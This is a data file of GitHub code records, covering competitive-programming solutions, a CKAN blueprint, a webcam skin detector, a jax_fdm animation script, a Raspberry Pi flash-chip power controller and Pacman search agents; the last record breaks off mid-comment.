+{"seq_id":"74713948072","text":"def isdivisible7(num): \n    n = len(num)\n    if (n == 1):\n        if (num==\"0\" or num==\"7\"): return 1\n        else: return 0\n    if (n % 3 == 1) : \n        num = str(num) + \"00\"\n        n += 2\n    elif (n % 3 == 2) : \n        num = str(num) + \"0\"\n        n += 1\n    GSum = 0\n    p = 1\n    # walk the digits in groups of three from the right, with alternating signs\n    for i in range(n - 1, 0, -3) : \n        group = 0\n        group += ord(num[i]) - ord('0') \n        group += (ord(num[i - 1]) - ord('0')) * 10\n        group += (ord(num[i - 2]) - ord('0')) * 100\n        GSum = GSum + group * p \n        p *= (-1) \n    #print(GSum)\n    return (GSum % 7 == 0) \n\ndef findSum(str1, str2): \n    if (len(str1) > len(str2)): \n        str1, str2 = str2, str1\n    res = \"\"\n    n1 = len(str1)\n    n2 = len(str2)\n    str1 = str1[::-1]\n    str2 = str2[::-1]\n    carry = 0\n    for i in range(n1): \n        s = ((ord(str1[i]) - 48) + ((ord(str2[i]) - 48) + carry))\n        res += chr(s % 10 + 48)\n        carry = int(s / 10)\n    for i in range(n1, n2): \n        s = ((ord(str2[i]) - 48) + carry)\n        res += chr(s % 10 + 48)\n        carry = int(s / 10)\n    if (carry): \n        res += chr(carry + 48)\n    res = res[::-1]\n    return res \n\nn = int(input())\nfor i in range(n):\n    x = input()\n    cnt = 0\n    while (not isdivisible7(x)):\n        rev = x[::-1]\n        x = findSum(x, rev)\n        cnt = cnt + 1\n        #print(x)\n        if cnt >= 1000: break\n    if (cnt>=1000): print(-1)\n    else: print(x)\n\n","repo_name":"dminhvu/CompetitiveProgramming","sub_path":"Coding Problems/ACM ICPC/Nothern 
Central/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74044670951","text":"import logging\n\nfrom ckan.plugins import toolkit\nfrom flask import Blueprint\n\nlogger = logging.getLogger(__name__)\n\nemc_blueprint = Blueprint(\n    \"emc\", __name__, template_folder=\"templates\", url_prefix=\"/emc\"\n)\n\n\n@emc_blueprint.route(\"/request_dataset_maintenance/<dataset_id>\")\ndef request_dataset_maintenance(dataset_id):\n    toolkit.get_action(\"emc_request_dataset_maintenance\")(\n        data_dict={\"pkg_id\": dataset_id}\n    )\n    toolkit.h[\"flash_notice\"](\n        toolkit._(\n            \"Organization publishers have been notified of your request. You are now \"\n            \"following the dataset and will be notified when it has been modified.\"\n        )\n    )\n    return toolkit.redirect_to(\"dataset.read\", id=dataset_id)\n\n\n@emc_blueprint.route(\n    \"/request_dataset_management/<dataset_id>/<management_command>\"\n)\ndef request_dataset_management(dataset_id, management_command):\n    action_name = {\n        \"maintenance\": \"emc_request_dataset_maintenance\",\n        \"publication\": \"emc_request_dataset_publication\",\n    }[management_command]\n    toolkit.get_action(action_name)(data_dict={\"pkg_id\": dataset_id})\n    toolkit.h[\"flash_notice\"](\n        toolkit._(\n            \"Organization publishers have been notified of your request. You are now \"\n            \"following the dataset and will be notified when it has been modified.\"\n        )\n    )\n    return toolkit.redirect_to(\"dataset.read\", id=dataset_id)\n","repo_name":"kartoza/ckanext-dalrrd-emc-dcpr","sub_path":"ckanext/dalrrd_emc_dcpr/blueprints/emc.py","file_name":"emc.py","file_ext":"py","file_size_in_byte":1434,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"10006538329","text":"from aiortc import RTCDataChannel, RTCDataChannelParameters\n\nasync def create_data_channel(transport):\n    parameter = RTCDataChannelParameters(\n        id = 2,\n        label=\"chat-1\",\n        maxPacketLifeTime=10,\n        maxRetransmits=None,\n        negotiated=True,\n        ordered=False,\n        protocol=\"\"\n    )\n    return RTCDataChannel(transport=transport, parameters=parameter)","repo_name":"choudhary2000/nimble_ai","sub_path":"client/src/data_channel.py","file_name":"data_channel.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"25962152197","text":"# !/usr/bin/env python\r\n# -*- coding:utf-8 -*-\r\n# @Time : 2022/1/13 0013 14:27\r\n# @Author : Administrator\r\n# @File : cs4for循环.py\r\n# @Software: PyCharm\r\n'''\r\nmoney=float(input('Enter the amount: '))\r\nif 0<=money<=49:\r\n    print('Total is {} yuan, no discount'.format(money))\r\n\r\nelif 50<=money<=100:\r\n    print('Total is {} yuan, 10% off'.format(money),0.9*money)\r\nelif 100 < money :\r\n    print('Total is {} yuan, 20% off'.format(money),0.8*money)\r\n '''\r\nimport random\r\n\r\n'''\r\nmoney2=float(input('Enter an integer: '))\r\nif money2 % 3==0 and money2 % 5==0:\r\n    print(\"Multiple of both 3 and 5, discount applies\")\r\nelse:\r\n    print('no discount')\r\n'''\r\n# Rock-paper-scissors\r\n'''\r\ni=0\r\nwhile i<4:\r\n    a=random.randint(1,3)\r\n    money3 = float(input('Enter a number (1-3): '))\r\n    if money3-a==0:\r\n        print('draw',a)\r\n    elif (money3==1 and a==2 ) or (money3==2 and a==3 ) or (money3==3 and a==1 ) :\r\n        print('win',a)\r\n    else:\r\n        print('loser',a)\r\n\r\n    i += 1\r\n'''\r\n# Print a star triangle\r\n# for i in range(4):\r\n#     for a in range(4-i):\r\n#         print('*',end=' ')\r\n#     print()\r\n\r\n# Multiplication table\r\n# for i in range(10):\r\n#     for a in range(i):\r\n#         print(a+1,'*',i,'=',(a+1)*i,end=' ')\r\n# 
print()\r\n\r\n# List comprehensions\r\nli=[]\r\nfor i in range(21):\r\n    d='page{}'.format(i)\r\n    li.append(d)\r\nprint(li)\r\n\r\nli2=['page{}'.format(i) for i in range(10)]\r\nprint(li2)\r\n\r\ntu =(11,22,55,5,3,7,3)\r\nli3=[i+1 for i in tu]\r\nprint(li3)\r\nli3=[i*10 for i in tu]\r\nprint(li3)\r\n\r\n\r\nli4=[1,2,3,4]\r\ncount=0\r\nfor a in li4:\r\n    for b in li4 :\r\n        for c in li4 :\r\n            if a!=b and a!=c and c!=b:\r\n                count+=1\r\n\r\nprint(count,'6')\r\n","repo_name":"ctrl00100/pythonProject","sub_path":"cs4for循环.py","file_name":"cs4for循环.py","file_ext":"py","file_size_in_byte":1645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"34591013225","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n__author__ = 'Will Brennan'\n\nimport argparse\nimport logging\nimport cv2\nimport skin_detector\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description=__doc__)\n    parser.add_argument('-b', '--debug', dest='debug', action='store_true', help='enable debug logging')\n    parser.add_argument('-t', '--thresh', dest='thresh', default=0.5, type=float, help='threshold for skin mask')\n    args = parser.parse_args()\n\n    if args.debug:\n        logging.basicConfig(level=logging.DEBUG)\n    else:\n        logging.basicConfig(level=logging.INFO)\n    logger = logging.getLogger(\"main\")\n\n    cam = cv2.VideoCapture(0)\n    logging.info(\"press any key to exit\")\n\n    while True:\n        ret, img_col = cam.read()\n        img_msk = skin_detector.process(img_col)\n\n        skin_detector.scripts.display('img_col', img_col)\n        skin_detector.scripts.display('img_msk', img_msk)\n        skin_detector.scripts.display('img_skn', cv2.bitwise_and(img_col, img_col, mask=img_msk))\n\n        waitkey = cv2.waitKey(5)\n        if waitkey != -1:\n            break\n","repo_name":"WillBrennan/SkinDetector","sub_path":"WebCam.py","file_name":"WebCam.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"75"}
+{"seq_id":"18516824004","text":"__author__ = 'Richard'\nimport sys\nclass Solution:\n    # @param {integer[][]} costs\n    # @return {integer}\n    def minCost(self, costs):\n        n=len(costs)\n        if n == 0:\n            return 0\n        dp=[[0 for col in range(3)] for row in range(2)]\n        for j in range(3):\n            dp[0][j]=costs[0][j]\n        for i in range(1, n):\n            for j in range(3):\n                dp[1][j]=sys.maxsize\n                for k in range(1,3):\n                    dp[1][j]=min(dp[1][j], dp[0][(j+k)%3]+costs[i][j])\n            for j in range(3):\n                dp[0][j]=dp[1][j]\n        return min(dp[0][0], dp[0][1], dp[0][2])","repo_name":"zhangruichang/Algorithm","sub_path":"Leetcode/Python/PaintHouse.py","file_name":"PaintHouse.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"70302030323","text":"# the essentials\nimport os\nfrom math import pi\nimport numpy as np\n\n# jax_fdm\nfrom jax_fdm.optimization import OptimizationRecorder\n\nfrom jax_fdm.datastructures import FDNetwork\n\nfrom jax_fdm.equilibrium import EquilibriumModel\nfrom jax_fdm.equilibrium import fdm\nfrom jax_fdm.equilibrium import network_update\n\nfrom jax_fdm.visualization import Viewer\n\n\n# ==========================================================================\n# Read in optimization history\n# ==========================================================================\n\nname = \"monkey_saddle\"\n\nmodify_view = True\nshow_grid = True\ncamera_zoom = -35  # -35 for monkey saddle, 0 for pringle, 14 for dome, -70 for butt\n\ndecimate = False\ndecimate_step = 0\n\ninterval = 
50 # 50\ntimeout = None\nfps = 8\n\nanimate = True\nrotate_while_animate = True\n\nsave = True\n\n# ==========================================================================\n# Read in force density network\n# ==========================================================================\n\nHERE = os.path.join(os.path.dirname(__file__), \"../../data/json/\")\nFILE_IN = os.path.abspath(os.path.join(HERE, f\"{name}_base.json\"))\nnetwork0 = FDNetwork.from_json(FILE_IN)\nmodel = EquilibriumModel(network0)\nnetwork = fdm(network0)\n\n# ==========================================================================\n# Read in optimization history\n# ==========================================================================\n\nFILE_IN = os.path.abspath(os.path.join(HERE, f\"{name}_history.json\"))\nrecorder = OptimizationRecorder.from_json(FILE_IN)\n\n# ==========================================================================\n# Visualization\n# ==========================================================================\n\n# instantiate viewer\nviewer = Viewer(width=1600, height=900, show_grid=show_grid)\n\n# modify view\nif modify_view:\n # number of steps, negative to zoom out\n viewer.view.camera.zoom(camera_zoom)\n # set rotation around z axis to zero\n viewer.view.camera.rotation[2] = 2 * pi / 3\n # set rotation around z axis to zero\n viewer.view.camera.rotation_delta = (2 / 3) * pi / len(recorder.history)\n\n# draw network\nviewer.add(network,\n edgewidth=(0.05, 0.25),\n edgecolor=\"fd\",\n show_nodes=False,\n nodesize=0.5,\n show_reactions=True,\n show_loads=True\n )\n\n# warm start model\nq, xyz_fixed, _loads = [np.asarray(p) for p in recorder.history[0]]\n_ = model(q, xyz_fixed, _loads)\n\n# decimate\nif decimate:\n history = recorder.history[::decimate_step]\n recorder.history = history\n\n# create update function\nif animate:\n config_animate = {\"interval\": interval,\n \"timeout\": timeout,\n \"frames\": len(recorder.history),\n \"record\": save,\n \"record_fps\": fps,\n \"record_path\": f\"temp/{name}_{fps}fps_viewer.gif\"}\n\n @viewer.on(**config_animate)\n def wiggle(f):\n\n print(f\"Current frame: {f + 1}/{len(recorder.history)}\")\n params = (np.array(p) for p in recorder.history[f])\n eqstate = model(*params)\n\n # update network\n network_update(network, eqstate)\n\n # update all buffer objects in the view\n for artist in viewer.artists:\n artist.update()\n for obj in artist.objects:\n obj.update()\n\n if rotate_while_animate:\n viewer.view.camera.rotate(dx=1, dy=0)\n\n# show le crème\nviewer.show()\n","repo_name":"arpastrana/jax_fdm","sub_path":"examples/animation/animation_mesh.py","file_name":"animation_mesh.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"75"} +{"seq_id":"16345294605","text":"#!/usr/bin/env python3\nfrom i2c import i2cAdc, i2cPot\nfrom gpio import pi_gpio\nfrom time import sleep\nimport sys\nfrom utils import isfloat\nfrom database import flashLogger, getconfig\n\ngpio = pi_gpio()\nadc = i2cAdc()\npot = i2cPot()\n\nstepOffset = getconfig(\"VoltageRegulatorAdjustment\")\n\nvoltageAccuracyThreshold = 0.05\n\n\ndef maxPwrControlVoltage():\n return 3.4\n\n\ndef getPotForVoltage(target):\n global stepOffset\n FirstUsefulValue = 45\n Slope = 0.045977678\n return int((5 - target) / (Slope)) + FirstUsefulValue + stepOffset\n\n\n# If your voltages aren't quite accurate, run this, delete the first rows that are all 5v\n# Paste the rest into the excel sheet and update the slope and 
firstusefulvalue above\ndef calibrate():\n potRange = 127\n tests = []\n gpio.setPsEn(True)\n for x in range(5):\n print(\"Calibrating round\", x, \"of 5\")\n test = {}\n for i in range(potRange):\n pot.setPot(i)\n sleep(0.1)\n test[i] = round(adc.getVoltage(), 2)\n tests.append(test)\n gpio.setPsEn(False)\n for i in range(potRange):\n avg = tests[0][i] + tests[1][i] + tests[2][i] + tests[3][i] + tests[4][i]\n avg = round(avg / 5, 2)\n print(i, avg, tests[0][i], tests[1][i], tests[2][i], tests[3][i], tests[4][i])\n\n\n# Verify our voltage settings\ndef checkPS():\n gpio.setPsEn(True)\n gpio.setPwrEn(False)\n\n print(\"Power supply accuracy test\")\n targets = [1.3, 1.6, 1.8, 2.0, 2.4, 2.8, 3.0, 3.1, 3.3, 3.6, 4.0]\n\n for target in targets:\n potValue = getPotForVoltage(target)\n pot.setPot(potValue)\n sleep(0.1)\n voltage = round(adc.getVoltage(), 2)\n print(\"Target:\", target, \"Act:\", voltage,\"Pot:\",potValue, end=\"\")\n if (\n target * (1 - voltageAccuracyThreshold)\n <= voltage\n <= target * (1 + voltageAccuracyThreshold)\n ):\n print(\" OK\")\n else:\n print(\" Failed\")\n\n gpio.setPsEn(False)\n\n\n# Set the pot for a specific voltage\ndef setVoltage(\n target: float,\n validate: bool = True,\n output: bool = False,\n logger: flashLogger = None,\n) -> bool:\n # Set the voltage to minimum and disable output before we turn it on\n if validate and target <= maxPwrControlVoltage():\n result = pot.setPot(127)\n gpio.setPwrEn(False)\n gpio.setPsEn(True)\n sleep(0.05)\n\n potValue = getPotForVoltage(target)\n result = pot.setPot(potValue)\n if not result:\n return False\n sleep(0.20)\n if validate and target <= maxPwrControlVoltage():\n voltage = adc.getVoltage()\n if output:\n if logger:\n logger.logData(\"Voltage:\", round(voltage,2))\n else:\n print(\"Voltage:\", round(voltage,2))\n if (\n target * (1 - voltageAccuracyThreshold)\n <= voltage\n <= target * (1 + voltageAccuracyThreshold)\n ):\n return True\n if logger:\n logger.logData(\n \"Voltage inaccurate! Check calibration. Target:\",\n target,\n \"Actual:\",\n voltage,\n )\n else:\n print(\n \"Voltage inaccurate! Check calibration. Target:\",\n target,\n \"Actual:\",\n voltage,\n )\n return False\n return True\n\n\ndef disablePower():\n gpio.setPwrEn(False)\n gpio.setPsEn(False)\n\n\ndef enablePower(logFile: flashLogger = None):\n gpio.setPsEn(True)\n gpio.setPwrEn(True)\n sleep(0.2) # Make sure the supply is stable\n voltage = adc.getVoltage()\n if logFile:\n logFile.logData(\"Voltage before flashing:\" + str(voltage))\n else:\n print(\"Voltage before flashing:\" + str(voltage))\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1:\n if isfloat(sys.argv[1]):\n setVoltage(float(sys.argv[1]), True, False)\n gpio.setPwrEn(True)\n elif sys.argv[1].lower() == \"off\":\n gpio.setPwrEn(False)\n gpio.setPsEn(False)\n else:\n print(\"Please remove any chips and press Enter to test power supply accuracy\")\n print(\n \"DON'T DO THIS WITH A CHIP ATTACHED, YOU MIGHT DAMAGE IT! 
Press CTRL+C to Cancel\"\n )\n input()\n checkPS()\n","repo_name":"SeanMollet/PieFlasher","sub_path":"SW/power.py","file_name":"power.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"15563838843","text":"import random, util\nimport numpy as np\nimport time\nfrom game import Agent\n\n# ********* Reflex agent- sections a and b *********\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n \"\"\"\n def __init__(self):\n self.lastPositions = []\n self.dc = None\n self._turn_durations = []\n\n\n def getAction(self, gameState):\n \"\"\"\n getAction chooses among the best options according to the evaluation function.\n\n getAction takes a GameState and returns some Directions.X for some X in the set {North, South, West, East, Stop}\n ------------------------------------------------------------------------------\n \"\"\"\n # measure run time\n start_time = time.time()\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n end_time = time.time()\n self._turn_durations.append(end_time - start_time)\n\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n The evaluation function takes in the current GameState (pacman.py) and the proposed action\n and returns a number, where higher numbers are better.\n \"\"\"\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n return betterEvaluationFunction(successorGameState)\n\n def final(self, state):\n print('Average turn time: {:0.3f}'.format(np.average(self._turn_durations)))\n self._turn_durations = []\n\n# ********* Evaluation functions *********\n\ndef scoreEvaluationFunction(gameState):\n \"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n \"\"\"\n return gameState.getScore()\n\n######################################################################################\n# b: implementing a better heuristic function\ndef betterEvaluationFunction(gameState):\n \"\"\"\n\n The betterEvaluationFunction takes in a GameState (pacman.py) and should return a number, where higher numbers are better.\n\n A GameState specifies the full game state, including the food, capsules, agent configurations and more.\n Following are a few of the helper methods that you can use to query a GameState object to gather information about\n the present state of Pac-Man, the ghosts and the maze:\n\n gameState.getLegalActions():\n gameState.getPacmanState():\n gameState.getGhostStates():\n gameState.getNumAgents():\n gameState.getScore():\n The GameState class is defined in pacman.py and you might want to look into that for other helper methods.\n \"\"\"\n pacmanPosition = gameState.getPacmanPosition()\n score = gameState.getScore()\n # Calculate ghosts score\n numAgents = gameState.getNumAgents()\n numGhosts = numAgents - 1\n capsuleDistance = min([util.manhattanDistance(capsule, pacmanPosition) for capsule in gameState.getCapsules()], default=0)\n ghostIndices = range(1, numAgents)\n 
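Editorial aside: the evaluation code in this Pacman record leans entirely on util.manhattanDistance from the Berkeley course codebase. A minimal, self-contained sketch of that helper plus a nearest-target lookup, assuming nothing beyond the standard library — the function names and sample positions here are illustrative, not part of the original submission:

def manhattan_distance(a, b):
    """L1 distance between two (x, y) grid positions."""
    return abs(a[0] - b[0]) + abs(a[1] - b[1])

def nearest(origin, targets):
    """Return (target, distance) for the closest target, or (None, inf)."""
    best, best_d = None, float("inf")
    for t in targets:
        d = manhattan_distance(origin, t)
        if d < best_d:
            best, best_d = t, d
    return best, best_d

# Example: pick the closest of three food pellets from Pacman at (3, 4).
print(nearest((3, 4), [(0, 0), (5, 5), (3, 9)]))  # -> ((5, 5), 3)
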
getGhostDistance = lambda g: util.manhattanDistance(pacmanPosition, gameState.getGhostPosition(g))\n closestGhostIndex = min(ghostIndices, key=lambda g: getGhostDistance(g), default=None)\n if closestGhostIndex is None:\n # To avoid getting stuck in loops with no ghosts to break them\n ghostScore = util.random.randint(-10, 10)\n else:\n ghostDistance = getGhostDistance(closestGhostIndex)\n if gameState.getGhostState(closestGhostIndex).scaredTimer:\n # Scared ghosts are an opportunity\n ghostScore = 200 - ghostDistance\n else:\n # Brave ghosts are scary :(\n ghostScore = -(500 - ghostDistance)\n\n # Calculate food score\n food = gameState.getFood()\n foodDistance = np.inf\n for x in range(food.width):\n for y in range(food.height):\n if not food[x][y]:\n continue\n d = util.manhattanDistance(pacmanPosition, (x, y))\n if d < foodDistance:\n foodDistance = d\n foodScore = 10/foodDistance\n\n return score + foodScore + ghostScore\n\n# ********* MultiAgent Search Agents- sections c,d,e,f*********\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxAgent, AlphaBetaAgent & both ExpectimaxAgents.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'betterEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n self._turn_durations = []\n\n # Generic form for getAction, used by all class children\n def _getAction(self, gameState, strategyFunc, kwargs_func=None, init_func=None, newmax_func=None):\n from game import Directions\n begin_time = time.time()\n legal_moves = gameState.getLegalActions(self.index)\n max_score = None\n best_move = Directions.STOP\n if init_func:\n init_func()\n for move in legal_moves:\n state = gameState.generateSuccessor(self.index, move)\n if kwargs_func:\n kwargs = kwargs_func()\n else:\n kwargs = {}\n score = strategyFunc(state, self.index, self.depth, **kwargs)\n if max_score is None or score > max_score:\n max_score = score\n best_move = move\n if newmax_func:\n newmax_func(score)\n end_time = time.time()\n self._turn_durations.append(end_time - begin_time)\n return best_move\n\n def final(self, state):\n print('Average turn time: {:0.3f}'.format(np.average(self._turn_durations)))\n self._turn_durations = []\n\n\n######################################################################################\n# c: implementing minimax\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action from the current gameState using self.depth\n and self.evaluationFunction. 
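Editorial aside: the _minimax method defined further down in this record alternates max and min layers over GameStates. A toy version of that recursion over an explicit tree may help; the tree shape and leaf values below are made up for demonstration — in the real agent the children come from generateSuccessor and the leaf values from the evaluation function:

def minimax(node, maximizing):
    # Leaves are plain numbers standing in for heuristic values.
    if isinstance(node, (int, float)):
        return node
    values = [minimax(child, not maximizing) for child in node]
    return max(values) if maximizing else min(values)

tree = [[3, 5], [2, 9]]      # two max-moves, each answered by two min-replies
print(minimax(tree, True))   # -> 3: max(min(3, 5), min(2, 9))
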
Terminal states can be found by one of the following:\n pacman won, pacman lost or there are no legal moves.\n\n Here are some method calls that might be useful when implementing minimax.\n\n gameState.getLegalActions(agentIndex):\n Returns a list of legal actions for an agent\n agentIndex=0 means Pacman, ghosts are >= 1\n\n Directions.STOP:\n The stop direction\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.getScore():\n Returns the score corresponding to the current state of the game\n\n gameState.isWin():\n Returns True if it's a winning state\n\n gameState.isLose():\n Returns True if it's a losing state\n\n self.depth:\n The depth to which search should continue\n\n \"\"\"\n return self._getAction(gameState, self._minimax)\n\n def _minimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._minimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: min layer\n return min(scores)\n\n\n######################################################################################\n# d: implementing alpha-beta\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent with alpha-beta pruning\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action using self.depth and self.evaluationFunction\n \"\"\"\n return self._getAction(gameState, self._alphabeta, kwargs_func=self._return_alpha_beta,\n init_func=self._init_alphabeta, newmax_func=self._update_alpha)\n\n def _init_alphabeta(self):\n self.alpha = -np.inf\n\n def _update_alpha(self, score):\n self.alpha = score\n\n def _return_alpha_beta(self):\n return dict(alpha=self.alpha, beta=np.inf)\n\n def _alphabeta(self, rootState, agentIndex, depth, alpha, beta):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # current agent is us: max layer\n if agentIndex == self.index:\n maxScore = -np.inf\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._alphabeta(nextState, nextAgent, nextDepth, alpha, beta)\n if score >= beta:\n # value from current branch will be unused, so trim it\n return np.inf\n if score > maxScore:\n maxScore = score\n if score > alpha:\n alpha = score\n return maxScore\n # current agnet is not us: min layer\n minScore = np.inf\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n 
nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._alphabeta(nextState, nextAgent, nextDepth, alpha, beta)\n if score <= alpha:\n # value from current branch will be unused, so trim it\n return -np.inf\n if score < minScore:\n minScore = score\n if score < beta:\n beta = score\n return minScore\n\n######################################################################################\n# e: implementing random expectimax\n\nclass RandomExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n All ghosts should be modeled as choosing uniformly at random from their legal moves.\n \"\"\"\n return self._getAction(gameState, self._expectimax)\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n # Get scores for all child states\n scores = []\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n scores.append(score)\n # current agent is us: max layer\n if agentIndex == self.index:\n return max(scores)\n # current agnet is not us: probabilistic layer\n # RandomGhost treats all steps with equal probabily, so calc a simple average\n return np.average(scores)\n\n######################################################################################\n# f: implementing directional expectimax\n\nclass DirectionalExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent\n \"\"\"\n\n rushProb = 0.8\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n All ghosts should be modeled as using the DirectionalGhost distribution to choose from their legal moves.\n \"\"\"\n return self._getAction(gameState, self._expectimax)\n\n def _expectimax(self, rootState, agentIndex, depth):\n # Handle end of game and out of depth\n legalMoves = rootState.getLegalActions(agentIndex)\n if rootState.isWin() or rootState.isLose() or not legalMoves:\n return rootState.getScore()\n if depth == 0:\n return self.evaluationFunction(rootState)\n\n numAgents = rootState.getNumAgents()\n isPacmanLayer = agentIndex == self.index\n # Get scores for all child states\n scores = []\n movesData = {}\n for move in legalMoves:\n nextState = rootState.generateSuccessor(agentIndex, move)\n nextAgent = (agentIndex + 1) % numAgents\n if nextAgent == 0:\n nextDepth = depth - 1\n else:\n nextDepth = depth\n score = self._expectimax(nextState, nextAgent, nextDepth)\n movesData[move] = dict(score=score)\n # Get the distance from pacman for ghosts (needed for probability calculations)\n if not isPacmanLayer:\n pacmanPos = nextState.getPacmanPosition()\n myPos = nextState.getGhostPosition(agentIndex)\n movesData[move][\"distance\"] = util.manhattanDistance(myPos, pacmanPos)\n # current agent is us: max layer\n if isPacmanLayer:\n return max([ m['score'] for m in movesData.values() ])\n # current agnet is not us: probabilistic layer\n # DirectionalGhost will pick try to rush us with probability >=rushProb\n # 
probability calculations is similiar to the one the ghost does\n probabilities = util.Counter()\n isScared = rootState.getGhostState(agentIndex).scaredTimer > 0\n if isScared:\n chosenDist = max([ m['distance'] for m in movesData.values() ])\n else:\n chosenDist = min([ m['distance'] for m in movesData.values() ])\n numActions = len(movesData)\n numChosen = len([m for m in movesData.values() if m['distance'] == chosenDist])\n for m, d in movesData.items():\n if d['distance'] == chosenDist:\n probabilities[m] = self.rushProb/numChosen\n probabilities[m] += (1-self.rushProb)/numActions\n probabilities.normalize()\n # Calculate expected score value based on probabilities above\n expected_value = 0\n for m, p in probabilities.items():\n expected_value += p * movesData[m]['score']\n return expected_value\n\n\n######################################################################################\n# I: implementing competition agent\n\nfrom game import Directions\nclass CompetitionAgent(MultiAgentSearchAgent):\n \"\"\"\n Your competition agent\n \"\"\"\n def __init__(self, depth=2):\n MultiAgentSearchAgent.__init__(self, depth=depth)\n self.evaluationFunction = self.betterEvaluationFunction\n self._timeLimit = 28\n self._startTime = time.time()\n\n def final(self, asd):\n # Restart the clock after game has finished\n self._startTime = time.time()\n\n def betterEvaluationFunction(self, gameState):\n pacmanPosition = gameState.getPacmanPosition()\n score = gameState.getScore()\n # Calculate ghosts score\n numAgents = gameState.getNumAgents()\n numGhosts = numAgents - 1\n capsuleDistance = min([util.manhattanDistance(capsule, pacmanPosition) for capsule in gameState.getCapsules()], default=0)\n ghostIndices = range(1, numAgents)\n getGhostDistance = lambda g: util.manhattanDistance(pacmanPosition, gameState.getGhostPosition(g))\n closestGhostIndex = min(ghostIndices, key=lambda g: getGhostDistance(g), default=None)\n if closestGhostIndex is None:\n # To avoid getting stuck in loops with no ghosts to break them\n ghostScore = util.random.randint(-10, 10)\n else:\n ghostState = gameState.getGhostState(closestGhostIndex)\n isScared = ghostState.scaredTimer > 0\n ghostDistance = getGhostDistance(closestGhostIndex)\n ghostPos = ghostState.getPosition()\n if isScared:\n # Scared ghosts are 